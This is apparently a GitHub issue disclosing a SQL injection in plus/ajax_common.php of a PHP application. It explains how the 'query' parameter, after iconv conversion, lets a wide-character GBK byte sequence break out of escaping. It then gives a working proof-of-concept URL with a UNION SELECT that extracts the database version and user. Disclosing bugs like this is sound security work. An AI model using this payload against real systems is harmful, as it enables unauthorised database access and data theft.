You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
$_GET['query'] pass to $gbk_query and then $gbk_query get iconv
so use some special word to do something with iconv ,like wide charactars( such as %8c%27 ) chinese word or some thing . and then get into sql and finally leads to sql inject .
plus/ajax_common.php
![image](https://user-images.githubusercontent.com/703783/74736998-e4761900-528e-11ea-87c7-1379d83078c4.png)
$_GET['query'] pass to $gbk_query and then $gbk_query get iconv
so use some special word to do something with iconv ,like wide charactars( such as %8c%27 ) chinese word or some thing . and then get into sql and finally leads to sql inject .
poc:
upload/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,concat(version(),user()),3%23%27
The text was updated successfully, but these errors were encountered: